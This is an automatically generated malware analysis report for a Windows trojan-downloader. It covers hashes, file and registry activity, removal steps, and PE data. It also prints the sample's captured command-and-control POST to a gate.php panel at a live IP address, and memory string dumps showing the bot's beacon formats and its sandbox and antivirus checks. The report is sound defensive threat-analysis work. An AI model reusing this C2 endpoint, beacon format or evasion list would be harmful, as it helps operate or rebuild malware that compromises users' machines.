Skip to main content

Trojan.GenericKD.2070492_36b45e5bfb


Trojan.Win32.Inject.sbkt (Kaspersky), Trojan.GenericKD.2070492 (AdAware), TrojanLoadMoney.YR, TrojanDownloaderVundo.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 36b45e5bfb2a8948516251a93752d081

SHA1: 53d77e6dbda8673080f0afbbc9b86cea4fc509d7

SHA256: e9b7f72295578608508ba8ae5df42f9b81f9b1f3139d9264e46d5fd00f286988

SSDeep: 3072:VwJ52Y7ZoH5XJacW4d1VCoiP5lIuKWc7UJYzxj8CSTn:VwHysrwiH4CYz3STn

Size: 110437 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2014-05-11 23:03:30

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2040

The Trojan injects its code into the following process(es):

%original file name%.exe:844

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:844 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\config\software (402 bytes)
%System%\config\SOFTWARE.LOG (1603 bytes)

The Trojan deletes the following file(s):

%WinDir%\306197153\ADService (0 bytes)

The process %original file name%.exe:2040 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (2484 bytes)
%Documents and Settings%\%current user%\Application Data\gambesons.x (1568 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (0 bytes)

Registry activity

The process %original file name%.exe:844 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 C7 D7 4B 39 B7 AB 20 CE 82 7B 0B 18 D7 B3 0F"

The Trojan deletes the following value(s) in system registry:


The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"*306197153"

The process %original file name%.exe:2040 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 49 B8 A2 F0 51 8E 0A A9 9F DE B5 2D 4B 8F B1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:2040

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\config\software (402 bytes)
    %System%\config\SOFTWARE.LOG (1603 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (2484 bytes)
    %Documents and Settings%\%current user%\Application Data\gambesons.x (1568 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: NirSoft
Product Name: DownTester
Product Version: 1.25.10.3
Legal Copyright: Copyright (c) 2009 - 2010 Nir Sofer
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.25.10.3
File Description: DownTester
Comments:
Language: English (United States)

Company Name: NirSoftProduct Name: DownTesterProduct Version: 1.25.10.3Legal Copyright: Copyright (c) 2009 - 2010 Nir SoferLegal Trademarks: Original Filename: Internal Name: File Version: 1.25.10.3File Description: DownTesterComments: Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409623144235524.4491e50f4a1111bafdc813b1f7ec153b8ea9
.rdata28672455846083.62903640f709ec19b4ed0455a4c64e5934d5e
.data3686410847210243.3764854c75104a38a6f79dc7a8d3b020a9139
.ndata1474563276800d41d8cd98f00b204e9800998ecf8427e
.rsrc180224733676802.8938497ee6ff03cc1ffae2acfafbd13faf3dc

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://23.228.100.130/~vpnmaste/panel/gate.php
hxxp://23.228.100.130:80/~vpnmaste/panel/gate.php

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /~vpnmaste/panel/gate.php HTTP/1.1

Host: 23.228.100.130:80

Connection: close

Content-Type: application/x-www-form-urlencoded

Cache-Control: no-cache

Content-Length: 468

a=bW5raGlmY3pheHVyc3BldmR5dHFsZ2J3b2o6Z2RlYnl2d3Rxcm9saWphdXBtaHpmY3hza24=&b=vHR5wGU6x25vZXbfY3r1qWQ6MTE4YtA0YtA3NtQ1NDErMWUmYTcrYTbeODA2ZDYrNtI2OTZgvHBmqXY6YWRhqW58YXJnqDj4ODZ8Z2VoZDjeZXNlpG9svGNuwgVtOnF8x3M6V19YUHr2ZXI6pnEoMC44vG5fpDk0LnB8xgV3OnF8&c=ijggdddabbyyvvwtttqqnnol

HTTP/1.1 404 Not Found

Date: Thu, 15 Jan 2015 00:22:36 GMT

Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4

Accept-Ranges: bytes

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html

1.....1.....95..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html>. <head>. <title>..579..404 Not Found</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <style type="text/css">. body {. .font-family: Verdana, Arial, Helvetica, sans-serif;. .font-size: 12px;. .background-color:#367E8E;. .scrollbar-base-color: #005B70;. .scrollbar-arrow-color: #F3960B;. .scrollbar-DarkShadow-Color: #000000;. .color: #FFFFFF;....margin:0;. }. a { color:#021f25; text-decoration:none}. h1 {. .font-size: 18px;. .color: #FB9802;. .padding-bottom: 10px;. .background-image: url(sys_cpanel/images/bottombody.jpg);. .background-repeat: repeat-x;. .padding:5px 0 10px 15px;....margin:0;. }. #body-content p {. .padding-left: 25px;. .padding-right: 25px;. .line-height: 18px;. .padding-top: 5px;. .padding-bottom: 5px;. }. h2 {. .font-size: 14px;. .font-weight: bold;. .color: #FF9900;. .padding-left: 15px;. }. </style>. </head>. <body>. <div id="body-content"> .<!-- start content-->..<!-- . instead of REQUEST_URI, we could show absolute URL via:. hXXp://HTTP_HOST/REQUEST_URI. but what if its hXXps:// or other protocol?. . SE

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_844:

`:%.jN

`:%.jN

tL

tL

L1NISvhFIzXBFvDjm0Xx`qZ6F3igo78UuVaYeD3qwmYendPBGejPjmpV3ZBKxBE4ijl4ARmIGGfiGXhMky`5jYpnoLV3Q4AjVt2PH7StnaS9ktdpZPECFY0OtGzJ4fS6ipHfYOb-QKmkHFYoLWOmyRTGOyxbgzO051ltrsDm0UEMoc6XaKEyV`HuyIaapEUP7Pbg`e0fIS2t-GMTVoKbh8sbiANge3aP6ApyiZjVmk0WaGw-1iJ1aca-S-yjElZfQv6UNG`laNR0VW9CTQMFb67QCZXRkn4UZPO`ljg0b9tQKpGARH7XVKMgoZbA7RcBnuODMeslN1ZL9YFHw4pE`RYrPY82QEXL`e28Ub2KJVkbgTQDuN9mlKQLKGds6BbK0cu7u9miye8EGO-xRzlOO4hoXEvCxuZNjL-CrzM0OwvEeQIlK8cJTSeSEEKX5eyHlxFH3J`yzp2wlecWHj8lfNQXE50rHsXTewkyCsXNGImzuX73Q1TM1hARso-V-L`CwCkhvQhBIEFn2pD4F`eBRmkxM-zp6CyASbmuZNgSmYhIX6ci2xRurnTMC4bhfr4L0tHgaIoNU`tHoW6z4mVbtbQ4M8F4HixPQ`ZAxkPAvQMzC8OuAHDUg3GM606rSXXdinDU16GUeDMTVOpR2cZSO9-fTrWNcLCbsKys2pbuwyfmFWzlZ9dtLL03spzOK2Z90TuoLrU2fvi4xfRi2zy1au-gsTf-aZK6wwOyDHBZGLUtL9N`I5NQZqiiD4gQUoCbSbqFqZ2dRIrB7-gG5x63bMzxfgYfaD09MotFYCuAnyKLPwexl1tkpZ6InjxJhBC61oY9veVzmK79tswQiZKEuunwPR4O4ovdJXmZ-c8yFmD7KrqiZn8GXdGMb0KZVTzmMNaNSFwa4Cf4md7yrEZ8RQJ0yt237wIZQ6SxPJsz3i-cd0EpXcd9KNh2motDTNgK`U0yW0h3kbbG13BHNeXcVtfTBf4-`BMipo00SeeTAfUUrRhO8bCADM2gkHX76R8IPEfHn-ZWlw~~

L1NISvhFIzXBFvDjm0Xx`qZ6F3igo78UuVaYeD3qwmYendPBGejPjmpV3ZBKxBE4ijl4ARmIGGfiGXhMky`5jYpnoLV3Q4AjVt2PH7StnaS9ktdpZPECFY0OtGzJ4fS6ipHfYOb-QKmkHFYoLWOmyRTGOyxbgzO051ltrsDm0UEMoc6XaKEyV`HuyIaapEUP7Pbg`e0fIS2t-GMTVoKbh8sbiANge3aP6ApyiZjVmk0WaGw-1iJ1aca-S-yjElZfQv6UNG`laNR0VW9CTQMFb67QCZXRkn4UZPO`ljg0b9tQKpGARH7XVKMgoZbA7RcBnuODMeslN1ZL9YFHw4pE`RYrPY82QEXL`e28Ub2KJVkbgTQDuN9mlKQLKGds6BbK0cu7u9miye8EGO-xRzlOO4hoXEvCxuZNjL-CrzM0OwvEeQIlK8cJTSeSEEKX5eyHlxFH3J`yzp2wlecWHj8lfNQXE50rHsXTewkyCsXNGImzuX73Q1TM1hARso-V-L`CwCkhvQhBIEFn2pD4F`eBRmkxM-zp6CyASbmuZNgSmYhIX6ci2xRurnTMC4bhfr4L0tHgaIoNU`tHoW6z4mVbtbQ4M8F4HixPQ`ZAxkPAvQMzC8OuAHDUg3GM606rSXXdinDU16GUeDMTVOpR2cZSO9-fTrWNcLCbsKys2pbuwyfmFWzlZ9dtLL03spzOK2Z90TuoLrU2fvi4xfRi2zy1au-gsTf-aZK6wwOyDHBZGLUtL9N`I5NQZqiiD4gQUoCbSbqFqZ2dRIrB7-gG5x63bMzxfgYfaD09MotFYCuAnyKLPwexl1tkpZ6InjxJhBC61oY9veVzmK79tswQiZKEuunwPR4O4ovdJXmZ-c8yFmD7KrqiZn8GXdGMb0KZVTzmMNaNSFwa4Cf4md7yrEZ8RQJ0yt237wIZQ6SxPJsz3i-cd0EpXcd9KNh2motDTNgK`U0yW0h3kbbG13BHNeXcVtfTBf4-`BMipo00SeeTAfUUrRhO8bCADM2gkHX76R8IPEfHn-ZWlw~~

uR2mlpMYv5W4VaWL9xsPDJQnbNe-RWVOw-eZPGEtf6dOEE5KjD0UeQfjZ3fi8qtGvtpJX3JZznnK7rIp3pidhaSa6f2`WMQlpSSldJf5nq3ICieMdKeqlc-uYmu7ZsiW3xNje09YsXIC0UzXFK1JRJ2Js-lbSCt72YHkB7kn4BhJdop2Y9zj4p93CqlTbT2WUwhjuv3NXc4nY3RweDpr4TcsKhjuLPkmbBedMY0uGavBaXr5mXRcmguEdW2wpN7hSl4zG3hlAfnFQypu5bcu9NTp-Yh`2AOOkz7ESmgINczE8xYbxufC54rtN2soEJ8mnDIVGyaHb2SN6kjo73dCh1dvznECtF0q2O3o4Ol`VhfPTIX9JfOsgoJY`-YNMIXrjpeNj54bwpTa8ztzieNgq17ilaVGQjfRAt6-RHefOjRSSsgNY0eDnmyoVRW3YJMAH7kewelPoyZMOyi9bJl4wIA-Z-sEz40GeoqekIVOU4b`KVujg3EAp6-R7hpalFlpmMhN9FgSgQtYLrTpdfp3ZQ54EsmglgmWHNyR2z5milwrVsWEfzituwQr75q7Ui2vqOHXZrgHH9mBs`sv8z57OUvwgKQIJq`1RCT0LJaQmbwf5m23hHwaL7cMi4c1vRupB9BzWeUfFQaEOPd6li-MDQGB9kCqaq`HP1CNi66hgvU6VM6IkjSozXTfNTvdPo`r`wq0rfKuKo8gb`SbpLluUsqIyCvxXBSQj9nHxJKoNR92UXl0BlO4UZyXDKbyD49fO2oTgXk22ku-KRTkI4FkQ45okEA5JVHbAi-qMDMsG1v9l5mvjBQxr14gbhZFzkHqTLoRZBG9c6Q5IqsoxVUun68-KfL4BVvZXKAThnMcyFno4VPu6TLKVVMdUef3-lXkQRrRirk`IqKVttxx7NYld793l17ASa0QyqhjvtTGofic8iY6W3u012yaOuINdZA9BQlj99icwj0s67y-rikCvm4PmbHKZCdI7kc92q2ftiDYbNHFFJXHNZqNPi6rSJZYKhyCiiJjna00xjA9l`747bWXqfZeVnxB24MdwxlCcIDvNWQFk7wXvME0t-Bej3NgnN0t1ugB19nUApQUQPdaemUviFhpllFjI0s~

uR2mlpMYv5W4VaWL9xsPDJQnbNe-RWVOw-eZPGEtf6dOEE5KjD0UeQfjZ3fi8qtGvtpJX3JZznnK7rIp3pidhaSa6f2`WMQlpSSldJf5nq3ICieMdKeqlc-uYmu7ZsiW3xNje09YsXIC0UzXFK1JRJ2Js-lbSCt72YHkB7kn4BhJdop2Y9zj4p93CqlTbT2WUwhjuv3NXc4nY3RweDpr4TcsKhjuLPkmbBedMY0uGavBaXr5mXRcmguEdW2wpN7hSl4zG3hlAfnFQypu5bcu9NTp-Yh`2AOOkz7ESmgINczE8xYbxufC54rtN2soEJ8mnDIVGyaHb2SN6kjo73dCh1dvznECtF0q2O3o4Ol`VhfPTIX9JfOsgoJY`-YNMIXrjpeNj54bwpTa8ztzieNgq17ilaVGQjfRAt6-RHefOjRSSsgNY0eDnmyoVRW3YJMAH7kewelPoyZMOyi9bJl4wIA-Z-sEz40GeoqekIVOU4b`KVujg3EAp6-R7hpalFlpmMhN9FgSgQtYLrTpdfp3ZQ54EsmglgmWHNyR2z5milwrVsWEfzituwQr75q7Ui2vqOHXZrgHH9mBs`sv8z57OUvwgKQIJq`1RCT0LJaQmbwf5m23hHwaL7cMi4c1vRupB9BzWeUfFQaEOPd6li-MDQGB9kCqaq`HP1CNi66hgvU6VM6IkjSozXTfNTvdPo`r`wq0rfKuKo8gb`SbpLluUsqIyCvxXBSQj9nHxJKoNR92UXl0BlO4UZyXDKbyD49fO2oTgXk22ku-KRTkI4FkQ45okEA5JVHbAi-qMDMsG1v9l5mvjBQxr14gbhZFzkHqTLoRZBG9c6Q5IqsoxVUun68-KfL4BVvZXKAThnMcyFno4VPu6TLKVVMdUef3-lXkQRrRirk`IqKVttxx7NYld793l17ASa0QyqhjvtTGofic8iY6W3u012yaOuINdZA9BQlj99icwj0s67y-rikCvm4PmbHKZCdI7kc92q2ftiDYbNHFFJXHNZqNPi6rSJZYKhyCiiJjna00xjA9l`747bWXqfZeVnxB24MdwxlCcIDvNWQFk7wXvME0t-Bej3NgnN0t1ugB19nUApQUQPdaemUviFhpllFjI0s~

libgcj-13.dll

libgcj-13.dll

Mozilla/4.0 (compatible)

Mozilla/4.0 (compatible)

%s--%s

%s--%s

%s\B%i.tmp

%s\B%i.tmp

http.

http.

hXXp://

hXXp://

hXXps://

hXXps://

%y%m%d

%y%m%d

%s:%i

%s:%i

%s\browser%li.html

%s\browser%li.html

%s "%s"

%s "%s"

Software\Microsoft\Windows NT\CurrentVersion\Windows\load

Software\Microsoft\Windows NT\CurrentVersion\Windows\load

%s\%s.exe

%s\%s.exe

Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore

Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore

NoWindowsUpdate

NoWindowsUpdate

%s@%s

%s@%s

%s\I%li.bat

%s\I%li.bat

%s\U%li.bat

%s\U%li.bat

%s\Google\Chrome\Application\chrome.exe

%s\Google\Chrome\Application\chrome.exe

%s\Internet Explorer\iexplore.exe

%s\Internet Explorer\iexplore.exe

%s\Opera\opera.exe

%s\Opera\opera.exe

%s\Mozilla Firefox\firefox.exe

%s\Mozilla Firefox\firefox.exe

%s\Maxthon3\Bin\Maxthon.exe

%s\Maxthon3\Bin\Maxthon.exe

Google Chrome

Google Chrome

Opera

Opera

Firefox

Firefox

chrome.exe

chrome.exe

opera.exe

opera.exe

firefox.exe

firefox.exe

iexplore.exe

iexplore.exe

Maxthon.exe

Maxthon.exe

%s(%s)

%s(%s)

|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:

|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:

|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

%s%s%i%s%s%s%s%s

%s%s%i%s%s%s%s%s

%s:%s

%s:%s

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

|type:response|uid:%s|taskid:%i|return:%s|busy:%s|

|type:response|uid:%s|taskid:%i|return:%s|busy:%s|

autoruns.exe

autoruns.exe

explorer.exe

explorer.exe

SbieDll.dll

SbieDll.dll

snxhk.dll

snxhk.dll

dbghelp.dll

dbghelp.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion

76487-640-1457236-23837

76487-640-1457236-23837

76487-644-3177037-23510

76487-644-3177037-23510

55274-640-2673064-23950

55274-640-2673064-23950

76497-640-6308873-23835

76497-640-6308873-23835

Windows Task Manager

Windows Task Manager

%s %i %i

%s %i %i

.hidden

.hidden

filesearch.stop

filesearch.stop

%s@%s:%i

%s@%s:%i

%s\System32\drivers\etc\protocol

%s\System32\drivers\etc\protocol

%s\Microsoft.NET\Framework\

%s\Microsoft.NET\Framework\

v4.0.30319

v4.0.30319

v2.0.50727

v2.0.50727

\explorer.exe

\explorer.exe

HTTP/1.

HTTP/1.

text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

application/x-www-form-urlencoded

application/x-www-form-urlencoded

HTTP/1.

HTTP/1.

dnsapi.dll

dnsapi.dll

%s & %s

%s & %s

Software\Microsoft\Windows\CurrentVersion\

Software\Microsoft\Windows\CurrentVersion\

\Microsoft\Windows

\Microsoft\Windows

%s%s%s%s%i%s%s

%s%s%s%s%i%s%s

:Zone.Identifier

:Zone.Identifier

%s\K%li.bat

%s\K%li.bat

document.write(unescape('%s'));

document.write(unescape('%s'));

operator

operator

operator

operator

global constructors keyed to

global constructors keyed to

global destructors keyed to

global destructors keyed to

operator""

operator""

VirtualQuery failed for %d bytes at address %p

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

Unknown pseudo relocation bit size %d.

fc_key

fc_key

use_fc_key

use_fc_key

hXXp://23.228.100.130/~vpnmaste/panel/gate.php

hXXp://23.228.100.130/~vpnmaste/panel/gate.php

v1.0.8

v1.0.8

~vpnmaste/panel/gate.php

~vpnmaste/panel/gate.php

23.228.100.130

23.228.100.130

%WinDir%

%WinDir%

%Program Files%

%Program Files%

%Documents and Settings%\All Users

%Documents and Settings%\All Users

%Documents and Settings%\%current user%

%Documents and Settings%\%current user%

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

%Documents and Settings%\All Users\Start Menu\Programs\Startup

%Documents and Settings%\All Users\Start Menu\Programs\Startup

%Program Files%\Internet Explorer\iexplore.exe

%Program Files%\Internet Explorer\iexplore.exe

%Program Files%\Opera\opera.exe

%Program Files%\Opera\opera.exe

%Program Files%\Mozilla Firefox\firefox.exe

%Program Files%\Mozilla Firefox\firefox.exe

%Program Files%\Maxthon3\Bin\Maxthon.exe

%Program Files%\Maxthon3\Bin\Maxthon.exe

e.exe

e.exe

ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8

ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8

306197153

306197153

c:\%original file name%.exe

c:\%original file name%.exe

%WinDir%\306197153

%WinDir%\306197153

%WinDir%\306197153\ADService

%WinDir%\306197153\ADService

NICK

NICK

JOIN

JOIN

PRIVMSG

PRIVMSG

GetProcessHeap

GetProcessHeap

RegCloseKey

RegCloseKey

RegCreateKeyExA

RegCreateKeyExA

RegFlushKey

RegFlushKey

RegOpenKeyExA

RegOpenKeyExA

ShellExecuteA

ShellExecuteA

InternetOpenUrlA

InternetOpenUrlA

.text

.text

P`.data

P`.data

.rdata

.rdata

`@.eh_fram

`@.eh_fram

0@.bss

0@.bss

.idata

.idata

VXa# %D

VXa# %D

&%spie);

&%spie);

.kedD

.kedD

.CRT

.CRT

KERNEL32.DLL

KERNEL32.DLL

ADVAPI32.DLL

ADVAPI32.DLL

msvcrt.dll

msvcrt.dll

SHELL32.DLL

SHELL32.DLL

USER32.dll

USER32.dll

WININET.DLL

WININET.DLL

Okernel32.dll

Okernel32.dll

advapi32.dll

advapi32.dll

Aicmp.dll

Aicmp.dll

surlmon.dll

surlmon.dll

gws2_32.dll

gws2_32.dll

rpcrt4.dll

rpcrt4.dll

%original file name%.exe_844_rwx_00400000_00087000:

`:%.jN

`:%.jN

tL

tL

L1NISvhFIzXBFvDjm0Xx`qZ6F3igo78UuVaYeD3qwmYendPBGejPjmpV3ZBKxBE4ijl4ARmIGGfiGXhMky`5jYpnoLV3Q4AjVt2PH7StnaS9ktdpZPECFY0OtGzJ4fS6ipHfYOb-QKmkHFYoLWOmyRTGOyxbgzO051ltrsDm0UEMoc6XaKEyV`HuyIaapEUP7Pbg`e0fIS2t-GMTVoKbh8sbiANge3aP6ApyiZjVmk0WaGw-1iJ1aca-S-yjElZfQv6UNG`laNR0VW9CTQMFb67QCZXRkn4UZPO`ljg0b9tQKpGARH7XVKMgoZbA7RcBnuODMeslN1ZL9YFHw4pE`RYrPY82QEXL`e28Ub2KJVkbgTQDuN9mlKQLKGds6BbK0cu7u9miye8EGO-xRzlOO4hoXEvCxuZNjL-CrzM0OwvEeQIlK8cJTSeSEEKX5eyHlxFH3J`yzp2wlecWHj8lfNQXE50rHsXTewkyCsXNGImzuX73Q1TM1hARso-V-L`CwCkhvQhBIEFn2pD4F`eBRmkxM-zp6CyASbmuZNgSmYhIX6ci2xRurnTMC4bhfr4L0tHgaIoNU`tHoW6z4mVbtbQ4M8F4HixPQ`ZAxkPAvQMzC8OuAHDUg3GM606rSXXdinDU16GUeDMTVOpR2cZSO9-fTrWNcLCbsKys2pbuwyfmFWzlZ9dtLL03spzOK2Z90TuoLrU2fvi4xfRi2zy1au-gsTf-aZK6wwOyDHBZGLUtL9N`I5NQZqiiD4gQUoCbSbqFqZ2dRIrB7-gG5x63bMzxfgYfaD09MotFYCuAnyKLPwexl1tkpZ6InjxJhBC61oY9veVzmK79tswQiZKEuunwPR4O4ovdJXmZ-c8yFmD7KrqiZn8GXdGMb0KZVTzmMNaNSFwa4Cf4md7yrEZ8RQJ0yt237wIZQ6SxPJsz3i-cd0EpXcd9KNh2motDTNgK`U0yW0h3kbbG13BHNeXcVtfTBf4-`BMipo00SeeTAfUUrRhO8bCADM2gkHX76R8IPEfHn-ZWlw~~

L1NISvhFIzXBFvDjm0Xx`qZ6F3igo78UuVaYeD3qwmYendPBGejPjmpV3ZBKxBE4ijl4ARmIGGfiGXhMky`5jYpnoLV3Q4AjVt2PH7StnaS9ktdpZPECFY0OtGzJ4fS6ipHfYOb-QKmkHFYoLWOmyRTGOyxbgzO051ltrsDm0UEMoc6XaKEyV`HuyIaapEUP7Pbg`e0fIS2t-GMTVoKbh8sbiANge3aP6ApyiZjVmk0WaGw-1iJ1aca-S-yjElZfQv6UNG`laNR0VW9CTQMFb67QCZXRkn4UZPO`ljg0b9tQKpGARH7XVKMgoZbA7RcBnuODMeslN1ZL9YFHw4pE`RYrPY82QEXL`e28Ub2KJVkbgTQDuN9mlKQLKGds6BbK0cu7u9miye8EGO-xRzlOO4hoXEvCxuZNjL-CrzM0OwvEeQIlK8cJTSeSEEKX5eyHlxFH3J`yzp2wlecWHj8lfNQXE50rHsXTewkyCsXNGImzuX73Q1TM1hARso-V-L`CwCkhvQhBIEFn2pD4F`eBRmkxM-zp6CyASbmuZNgSmYhIX6ci2xRurnTMC4bhfr4L0tHgaIoNU`tHoW6z4mVbtbQ4M8F4HixPQ`ZAxkPAvQMzC8OuAHDUg3GM606rSXXdinDU16GUeDMTVOpR2cZSO9-fTrWNcLCbsKys2pbuwyfmFWzlZ9dtLL03spzOK2Z90TuoLrU2fvi4xfRi2zy1au-gsTf-aZK6wwOyDHBZGLUtL9N`I5NQZqiiD4gQUoCbSbqFqZ2dRIrB7-gG5x63bMzxfgYfaD09MotFYCuAnyKLPwexl1tkpZ6InjxJhBC61oY9veVzmK79tswQiZKEuunwPR4O4ovdJXmZ-c8yFmD7KrqiZn8GXdGMb0KZVTzmMNaNSFwa4Cf4md7yrEZ8RQJ0yt237wIZQ6SxPJsz3i-cd0EpXcd9KNh2motDTNgK`U0yW0h3kbbG13BHNeXcVtfTBf4-`BMipo00SeeTAfUUrRhO8bCADM2gkHX76R8IPEfHn-ZWlw~~

uR2mlpMYv5W4VaWL9xsPDJQnbNe-RWVOw-eZPGEtf6dOEE5KjD0UeQfjZ3fi8qtGvtpJX3JZznnK7rIp3pidhaSa6f2`WMQlpSSldJf5nq3ICieMdKeqlc-uYmu7ZsiW3xNje09YsXIC0UzXFK1JRJ2Js-lbSCt72YHkB7kn4BhJdop2Y9zj4p93CqlTbT2WUwhjuv3NXc4nY3RweDpr4TcsKhjuLPkmbBedMY0uGavBaXr5mXRcmguEdW2wpN7hSl4zG3hlAfnFQypu5bcu9NTp-Yh`2AOOkz7ESmgINczE8xYbxufC54rtN2soEJ8mnDIVGyaHb2SN6kjo73dCh1dvznECtF0q2O3o4Ol`VhfPTIX9JfOsgoJY`-YNMIXrjpeNj54bwpTa8ztzieNgq17ilaVGQjfRAt6-RHefOjRSSsgNY0eDnmyoVRW3YJMAH7kewelPoyZMOyi9bJl4wIA-Z-sEz40GeoqekIVOU4b`KVujg3EAp6-R7hpalFlpmMhN9FgSgQtYLrTpdfp3ZQ54EsmglgmWHNyR2z5milwrVsWEfzituwQr75q7Ui2vqOHXZrgHH9mBs`sv8z57OUvwgKQIJq`1RCT0LJaQmbwf5m23hHwaL7cMi4c1vRupB9BzWeUfFQaEOPd6li-MDQGB9kCqaq`HP1CNi66hgvU6VM6IkjSozXTfNTvdPo`r`wq0rfKuKo8gb`SbpLluUsqIyCvxXBSQj9nHxJKoNR92UXl0BlO4UZyXDKbyD49fO2oTgXk22ku-KRTkI4FkQ45okEA5JVHbAi-qMDMsG1v9l5mvjBQxr14gbhZFzkHqTLoRZBG9c6Q5IqsoxVUun68-KfL4BVvZXKAThnMcyFno4VPu6TLKVVMdUef3-lXkQRrRirk`IqKVttxx7NYld793l17ASa0QyqhjvtTGofic8iY6W3u012yaOuINdZA9BQlj99icwj0s67y-rikCvm4PmbHKZCdI7kc92q2ftiDYbNHFFJXHNZqNPi6rSJZYKhyCiiJjna00xjA9l`747bWXqfZeVnxB24MdwxlCcIDvNWQFk7wXvME0t-Bej3NgnN0t1ugB19nUApQUQPdaemUviFhpllFjI0s~

